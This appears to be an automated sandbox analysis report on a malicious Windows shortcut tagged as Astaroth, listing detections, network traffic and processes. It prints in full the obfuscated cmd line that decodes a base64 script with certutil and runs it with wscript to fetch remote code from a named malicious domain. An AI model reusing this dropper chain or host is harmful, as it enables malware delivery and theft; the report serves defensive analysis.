Windows Analysis Report
uk231b27we.lnk

Overview

General Information

Sample Name: uk231b27we.lnk
Analysis ID: 795686
MD5: 992f5faaef370f7963b09123eaee18dd
SHA1: cf99a5906e22105ade1f367f0c289fafa9952a1c
SHA256: d7ddebfa36f629e5ef41b692140e2c06f23b5c8017040215eaf0247a7db3b2f7
Tags: AstarothBRAgeoGuildmalnk
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Domain query: gwae8.industryinfluence.shop
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.221.22 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.124.96 443 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.3:49681 -> 172.67.221.22:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gwae8.industryinfluence.shopConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.16.124.96 104.16.124.96
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:46:05 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=HuxegvGqhPYj.RmC4Z5BvFwAUbphzy6uoWYlMjbn75I-1675233965-0-Aaaf9mQqj3uibNCAaCSZwu7+dUgj+Q0HUsqcC05pF3vk4twZOxrm6f79uC6VSOXzSChkWjNH93sJcyJueQo47SqbhV2WUSbMN6AYB2WG5yRf; path=/; expires=Wed, 01-Feb-23 07:16:05 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=6.0000002122251e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm6%2B2%2FiRNIaRnavKlgeBIJCR2OhRC7bTShI3kSlts9Bq%2F4TeHdgYWVJBiLxcPeIM1sfMbk%2FjhgDxcvV7GOQwTIwA95teLMMeDeK67IhNAo8%2BVCpBOBcm8gzNRgpFUH5GK2A%2FVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnKVGuWQtbjLxL; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:46:05 GMT; HttpOnlyServer: cloudflareCF-RAY: 7928ba5a6cd990ee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://gwae8.industryinfluence.shop/?3/
Source: wscript.exe, 00000003.00000003.257885861.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251546620.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258534912.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251838024.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.252114824.0000029B8EFE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gwae8.industryinfluence.shop/
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gwae8.industryinfluence.shop/?3/
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gwae8.industryinfluence.shop/b
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error&
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error(
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error2.L
Source: wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ
Source: wscript.exe, 00000003.00000003.251785022.0000029B90E13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorZ.4
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EF96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/~
Source: unknown DNS traffic detected: queries for: gwae8.industryinfluence.shop
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gwae8.industryinfluence.shopConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.3:49682 version: TLS 1.2
Source: C:\Windows\System32\certutil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: classification engine Classification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Data Obfuscation
barindex
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: wscript.exe, 00000003.00000002.258349869.0000029B8EF4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EF4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.257912420.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251961509.0000029B8EFD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251866049.0000029B8EF69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000003.00000003.251866049.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.251623224.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.258349869.0000029B8EF80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Domain query: gwae8.industryinfluence.shop
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.221.22 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.124.96 443 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\qxdhvbd\>nul 2>&1 &&s^et xecy=c:\qxdhvbd\^qxdhvbd.^js&&echo dmfyiemxoha9innjiisicii7rde4cd0iaxaikyj0omgio0uxoha9ilqikyj0ucirijoio0dlde9iamvjdchdmthwk0qxoharrte4ccsily9nd2floc5pbmr1c3ryewluzmx1zw5jzs5zag9wlz8zlyipow==>!xecy!&&certutil -f -deco^de !xecy! !xecy!&&ca^ll !xecy!
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 795686 Sample: uk231b27we.lnk Startdate: 01/02/2023 Architecture: WINDOWS Score: 68 18 Snort IDS alert for network traffic 2->18 20 Windows shortcut file (LNK) starts blacklisted processes 2->20 22 Obfuscated command line found 2->22 6 cmd.exe 3 4 2->6         started        process3 process4 8 wscript.exe 12 6->8         started        12 certutil.exe 3 2 6->12         started        dnsIp5 14 gwae8.industryinfluence.shop 172.67.221.22, 49681, 80 CLOUDFLARENETUS United States 8->14 16 www.cloudflare.com 104.16.124.96, 443, 49682 CLOUDFLARENETUS United States 8->16 24 System process connects to network (likely due to code injection or exploit) 8->24 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.221.22
 gwae8.industryinfluence.shop United States
13335 CLOUDFLARENETUS true
104.16.124.96
 www.cloudflare.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
www.cloudflare.com 104.16.124.96 true
gwae8.industryinfluence.shop 172.67.221.22 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.cloudflare.com/cdn-cgi/error false
    		high
    http://gwae8.industryinfluence.shop/?3/ true
      		unknown